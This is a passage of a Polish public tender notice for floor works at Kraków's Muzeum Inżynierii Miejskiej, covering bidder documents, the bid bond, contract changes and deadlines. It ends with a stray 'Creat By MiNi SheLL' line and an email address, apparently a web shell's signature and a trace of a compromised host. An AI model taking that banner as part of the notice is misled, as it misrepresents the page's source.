z art. 57 pkt 2 ustawy –<br/>spełniają warunki udziału w postępowaniu, tj. w zakresie posiadania zdolności technicznej lub<br/>zawodowej, tj. w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał co najmniej jedną<br/>robotę budowlaną obejmującą roboty elektryczne oraz wykonanie podłogi z w budynku o<br/>wartości nie mniejszej niż 400 000,00 zł brutto <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">6.2.1.	Oświadczenie o aktualności informacji zawartych w oświadczeniu/-ach, o którym/-ch mowa w pkt 6.1.5.1. SWZ w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w pkt 5.2. SWZ odpowiednio: <br/>a)	samego Wykonawcy lub każdego z Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia, <br/>b)	podmiotu/-ów, na którego/-ych zdolnościach technicznych lub zawodowych polega Wykonawca w celu potwierdzenia spełniania warunków udziału <br/>w postępowaniu – jeżeli dotyczy. <br/>- sporządzone wg. wzoru w Załączniku nr 8 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty oraz podmiotów, na rzecz których roboty te zostały wykonane, sporządzony<br/>wg wzoru stanowiącego załącznik nr 3 do SWZ, oraz z załączeniem dowodów określających, czy te<br/>roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje<br/>bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały<br/>wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy, na potwierdzenie spełniania warunku posiadania<br/>doświadczenia, o którym mowa w pkt 5.1. SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz Oferty, według wzoru stanowiącego Zał. nr 1 do SWZ, wypełniony i podpisany<br/>przez osoby umocowane należycie do reprezentowania Wykonawcy. 2. Wraz z ofertą<br/>Wykonawca składa:1) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej<br/>Ewidencji Informacji o Działalności Gospodarczej lub innego właściwego rejestru, chyba że<br/>Wykonawca w Formularzu Oferty wskaże dane umożliwiające dostęp do tych dokumentów<br/>samodzielnie przez Zamawiającego, poprzez bezpłatne i ogólnodostępne bazy danych; 2)<br/>pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy, jeżeli w jego imieniu działa osoba, której umocowanie do reprezentowania nie<br/>wynika z dokumentów wymienionych w pkt 1) powyżej; Opisane powyżej zasady stosuje się<br/>odpowiednio do osoby działającej w imieniu Wykonawców wspólnie ubiegających się o<br/>udzielenie niniejszego zamówienia oraz do osoby działającej w imieniu podmiotu<br/>udostępniającego zasoby.3) Zobowiązanie podmiotu udostępniającego zasoby do oddania do<br/>dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia, lub inny<br/>podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów, jako dowód polegania na zdolnościach<br/>technicznych lub zawodowych tego podmiotu, w odniesieniu do warunków udziału w<br/>postępowaniu, o których mowa w pkt. 5.1. SWZ – jeżeli dotyczy4) Oświadczenie, z którego<br/>wynika, które usługi wykonają poszczególni Wykonawcy – przy czym obowiązek ten dotyczy<br/>wyłącznie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z art. 117<br/>ust. 4 ustawy. 5) W celu wstępnego potwierdzenia, że Wykonawca nie podlega wykluczeniu<br/>oraz spełnia warunki udziału w postępowaniu, zgodnie z art. 125 ust. 1 i ust. 5 ustawy, składa on<br/>odrębne następujące oświadczenia: a) o niepodleganiu wykluczeniu z postępowania oraz b) o<br/>spełnianiu warunków udziału w postępowaniu, odpowiednio: i. samego Wykonawcy lub każdego<br/>z Wykonawców wspólnie ubiegających się o udzielenie zamówienia; ii. podmiotu/-ów, na<br/>którego/-ych zdolnościach technicznych lub zawodowych polega Wykonawca w celu<br/>potwierdzenia spełniania warunków udziału w postępowaniu – jeżeli dotyczy, według wzorów<br/>zaproponowanych odpowiednio w formularzach A, B, C i D zał. nr 2 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium w wysokości 10 000,00PLN.<br/>2. Wadium może być wnoszone:<br/>1) w pieniądzu – wpłacane przelewem na rachunek Zamawiającego w Banku PKO Bank Polski<br/>S.A. nr: 50 1020 2892 0000 5002 0642 2507 z dopiskiem „Wadium - Wykonanie robót<br/>budowlanych polegających na dostosowaniu posadzki w hali E do pełnienia funkcji sali<br/>wystawienniczej dla ekspozycji stałej w siedzibie Muzeum Inżynierii Miejskiej przy ul. św.<br/>Wawrzyńca 15 w Krakowie” - tak, aby przed upływem terminu składania ofert wadium<br/>znajdowało się na ww. rachunku.(UWAGA: W przypadku wnoszenia wadium na rzecz<br/>Wykonawcy przez inny podmiot, w tytule przelewu należy wyraźnie wskazać na rzecz jakiego<br/>Wykonawcy wnoszone jest wadium);<br/>2) w gwarancjach bankowych, gwarancjach ubezpieczeniowych lub poręczeniach udzielanych<br/>przez podmioty o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U. z 2020 r. poz.<br/>299) – w oryginale, wnoszone, przed upływem terminu składania ofert w postaci elektronicznej – opatrzone wyłącznie kwalifikowanym podpisem elektronicznym osób uprawnionych do<br/>reprezentowania gwaranta lub poręczyciela. Treść dokumentu nie może zawierać postanowień<br/>o jego automatycznym wygaśnięciu w przypadku zwrotu do wystawcy. Wadium w postaci<br/>elektronicznej musi być przesłane na Elektroniczną Skrzynkę Podawczą e-PUAP<br/>Zamawiającego wskazaną w pkt 1 SWZ.<br/>UWAGA! Skan dokumentu wystawionego w postaci papierowej, następnie opatrzony<br/>kwalifikowanym podpisem elektronicznym nie ma znamion oryginału (wyrok z 11 grudnia 2018 r.<br/>Krajowej Izby Odwoławczej Sygn. akt: KIO 2426/18).<br/>3) Dopuszczalne jest złożenie wadium w więcej niż jednej formie.<br/>3. Wadium wnoszone w formie gwarancji i poręczeń musi spełniać następujące wymogi:<br/>3.1. musi być wystawione na Muzeum Inżynierii Miejskiej w Krakowie ul. Św. Wawrzyńca 15, 31-<br/>060 Kraków;<br/>3.2. musi zawierać w swej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje<br/>się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego<br/>zawierające oświadczenie, iż zaszła jedna z przesłanek wymienionych w art. 98 ust. 6 ustawy<br/>Pzp;<br/>3.3. okres ważności wadium nie może być krótszy niż okres związania ofertą.<br/>4. Zamawiający zwróci wadium w sposób odpowiadający formie wnoszenia w przypadkach<br/>wymienionych w art. 98 ust. 1 i 2 ustawy Pzp. W przypadku wadium wniesionego w pieniądzu<br/>Zamawiający zwróci kwotę wadium wraz z odsetkami wynikającymi z umowy rachunku<br/>bankowego, na którym było ono przechowywane, pomniejszoną o koszty prowadzenia rachunku<br/>bankowego oraz o prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany<br/>przez Wykonawcę. Zamawiający zwraca wadium wniesione w innej formie niż w pieniądzu<br/>poprzez złożenie gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium.<br/>5. Zamawiający zwraca wadium w terminach określonych w art. 98 ust. 1 i 2 ustawy.<br/>6. Zamawiający zatrzyma wadium w wypadku, gdy zajdzie jedna z okoliczności wymienionych w<br/>art. 98 ust. 6 ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego (np. członkowie<br/>konsorcjum, wspólnicy spółki cywilnej), zgodnie z art. 58 ust. 2 ustawy, są zobowiązani<br/>ustanowić Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich<br/>w postępowaniu i do zawarcia umowy, i przedstawić stosowne dokumenty (pełnomocnictwa) w<br/>składanej ofercie.<br/>2. Ponadto Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego<br/>składają:<br/>2.1. każdy z osobna dotyczące ich dokumenty wskazane odpowiednio w pkt 6.1.5.1., a<br/>ponadto – na wezwanie Zamawiającego – także dokument opisany w pkt 6.2.1 SWZ dot.<br/>każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2.2. jeżeli dotyczy - dokumenty wskazane w pkt 6.1.3., 6.1.4., 6.1.5.1 dot. podmiotu<br/>udostępniającego zasoby, a ponadto – na wezwanie Zamawiającego – także 6.2.1. SWZ dot.<br/>podmiotu udostępniającego zasoby;<br/>2.3. dokumenty, o których mowa w pkt 6.1.1. i 6.1.2. SWZ (w tym dot. podmiotu<br/>udostępniającego zasoby – jeżeli dotyczy);<br/>2.4. ci z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, którzy spełniają<br/>dokumenty, o których mowa w pkt 6.1.5.2 SWZ;<br/>2.5. a na wezwanie Zamawiającego, ci z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, którzy spełniają warunek, na potwierdzenie którego wymagany jest dany dokument,<br/>także dokument wskazany w pkt 6.2.2. SWZ.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np. członkowie konsorcjum)<br/>ponoszą, zgodnie z art. 445 ust. 1 ustawy, solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy – jeżeli dotyczy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wprowadzenie zmian treści umowy wymaga sporządzenia pod rygorem nieważności formy<br/>pisemnej aneksu, z zastrzeżeniem art. 455 ust. 1 ustawy Prawo zamówień publicznych.<br/>2. Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień umowy w<br/>następujących przypadkach:<br/>1) wysokości wynagrodzenia w przypadku:<br/>a. zmiany stawki podatku VAT, w odniesieniu do tej części wynagrodzenia, której zmiana<br/>dotyczy,<br/>b. ograniczenia zakresu prac objętych niniejszą Umową w razie stwierdzenia braku konieczności<br/>wykonywania części zamówienia, ujętych w dokumentacji i SWZ,<br/>c. zmiany zakresu prac objętych niniejszą Umową w wyniku zmian opisanych w pkt. 3);<br/>2) terminu realizacji przedmiotu zamówienia, zakresu świadczenia, sposobu realizacji umowy i<br/>wynagrodzenia gdy są one spowodowane:<br/>a. siłą wyższą – rozumianą jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego,<br/>niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy<br/>zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonanie jego<br/>zobowiązania w części lub całości, a w szczególności epidemią COVID-19 stwierdzoną przez<br/>uprawnione do tego organy lokalne lub państwowe, klęską żywiołową, strajkiem lub stanem<br/>wyjątkowym,<br/>b. zmiany zakresu prac objętych niniejszą umową w przypadku zastosowania zmian opisanych<br/>w pkt. 3),<br/>c. następstwem okoliczności leżących po stronie Zamawiającego, takich jak: utrudnienia,<br/>zawieszenia robót lub przeszkodami dającymi się przypisać Zamawiającemu,<br/>d. koniecznością wprowadzenia zmian na etapie wykonawstwa robót z przyczyn niezależnych<br/>od obu stron związanymi z aktualizacją rozwiązań projektowych z uwagi na postęp<br/>technologiczny,<br/>e. koniecznością wykonania robót dodatkowych skutkujących zmianą zakresu robót i/lub<br/>przedłużenia terminu realizacji zamówienia. Roboty objęte zamówieniem dodatkowym będą<br/>zlecane po zawarciu z Wykonawcą stosownego aneksu. Udzielenie zamówienia dodatkowego<br/>musi być poprzedzone sporządzeniem protokołu konieczności,<br/>f. następstwem działania organów administracji lub innych podmiotów, związanych z<br/>przekroczeniem obowiązujących terminów wydawania lub odmowy wydania decyzji, zezwoleń,<br/>uzgodnień,<br/>g. następstwem wprowadzania zmian w obowiązujących przepisach prawnych mających wpływ<br/>na realizację przedmiotu zamówienia,<br/>h. wyjątkowo niekorzystne warunki atmosferyczne, długotrwałe deszcze, śnieg trwające pow. 7<br/>dni lub mróz uniemożliwiający wykonanie robót zgodnie ze sztuką;<br/>i. konieczności wykonania robót zamiennych. Roboty zamienne:<br/>i. polegają na tym, że Wykonawca zobowiązuje się do wykonania zamówienia podstawowego w<br/>sposób odmienny od określonego w umowie<br/>ii. nie mogą spowodować zwiększenia wynagrodzenia Wykonawcy,<br/>iii. konieczność wykonania robót zamiennych zachodzi między innymi w sytuacji, gdy:<br/>• materiały budowlane, osprzęt lub urządzenia przewidziane do wykonania zamówienia,<br/>wskazane w SWZ i załącznikach, nie mogą być użyte przy realizacji przedmiotu zamówienia z<br/>powodu zaprzestania produkcji, wycofania z rynku lub zastąpienia innymi lub lepszymi<br/>• w trakcie wykonania Przedmiotu zamówienia nastąpiła zmiana przepisów prawa budowlanego,<br/>• w czasie realizacji budowy zmienią się warunki techniczne wykonania przedmiotu zamówienia<br/>(np. Polska Norma),<br/>• w trakcie realizacji Przedmiotu zamówienia wystąpiła konieczność zmiany technologii<br/>wykonania robót<br/>j. niezależnymi od Wykonawcy opóźnieniami w dostawach sprzętu lub materiałów z powodów<br/>zależnych od Producentów lub dostawców sprzętu i materiałów<br/>k. zmianą umowy na podstawie art. 455 ust. 2 ustawy pzp<br/>Zmiana terminu realizacji przedmiotu zamówienia może ulec odpowiedniemu przedłużeniu, o<br/>czas niezbędny do wykonywania przedmiotu zamówienia, w sposób należyty, nie dłużej jednak,<br/>niż o czas trwania okoliczności wymienionych w ust. 1 powyżej.<br/>c.d. zawiera par. 16 wzoru umowy - załącznik nr 4 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-05 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę wraz z wymaganymi załącznikami za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-05 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 10.Za datę przekazania oferty, dokumentów, informacji i oświadczeń oraz ich cyfrowych<br/>odwzorowań przyjmuje się datę ich przekazania na ePUAP lub datę i godzinę serwera<br/>pocztowego Zamawiającego.<br/>11. Formaty danych wymagane do sporządzania i przekazywania dokumentów i informacji w<br/>postępowaniu określa § 2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego lub konkursie. Zamawiający wskazuje jednak, że wśród<br/>dopuszczalnych i ogólnie dostępnych formatów znajdują się m.in.: .txt, .rtf, .pdf, .doc, .docx,<br/>.odt., ze szczególnym wskazaniem na .pdf.<br/>12. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej<br/>może zawsze dokonać notariusz. Ponadto szczegółowe zasady poświadczania różnych<br/>kategorii dokumentów opisuje § 6 ust. 3 oraz § 7 ust. 3 Rozporządzenia przywołanego w pkt 11<br/>powyżej.<br/>13. W Formularzu oferty wartości liczbowe należy wpisywać w każdej pozycji wyłącznie cyframi,<br/>a w miejscach gdzie jest to wyraźnie wskazane także słownie (nie stosuje się wyrażenia „jw.” i<br/>równoważnych).<br/>14. Podmiotowe środki dowodowe, przedmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język<br/>polski.<br/>15. Zamawiający zastrzega sobie ponadto możliwość żądania, aby w przypadku wskazania<br/>przez Wykonawcę dostępności podmiotowych środków dowodowych lub dokumentów, o których<br/>mowa w pkt 6.1.2. lit. a SWZ, pod określonymi adresami internetowymi ogólnodostępnych i<br/>bezpłatnych baz danych, przedstawił on tłumaczenia na język polski pobranych samodzielnie<br/>przez Zamawiającego podmiotowych środków dowodowych lub dokumentów.<br/>16. W zakresie nieuregulowanym ustawą lub niniejszą SWZ do podmiotowych środków<br/>dowodowych, oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu<br/>zastosowanie mają w szczególności przepisy rozporządzenia przywołanego w pkt 8.4. SWZ<br/>powyżej oraz rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w<br/>sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich<br/>może żądać zamawiający od wykonawcy.<br/>Zamawiający informuje Wykonawców o ich uprawnieniu do przeprowadzenia wizji lokalnej terenu budowy i otoczenia planowanej Inwestycji. Zaleca się, aby Wykonawca dokonał wizji lokalnej, a także zdobył, na własną odpowiedzialność, koszt i ryzyko, wszelkie potrzebne informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. Koszt dokonania wizji lokalnej terenu budowy poniesie Wykonawca. Wizja lokalna ma charakter wyłącznie fakultatywny. Dokonanie wizji lokalnej nie jest warunkiem koniecznym do złożenia Oferty w postępowaniu.<br/>Wykonawca może skorzystać z wizji lokalnej, która została zaplanowana: w dniu 27.12.2021r. o godzinie 10.00 oraz w dniu 30.12.2021r. o godz. 10.00, miejsce spotkania: Muzeum Inżynierii Miejskiej ul. św. Wawrzyńca 15.

Creat By MiNi SheLL
Email: jattceo@gmail.com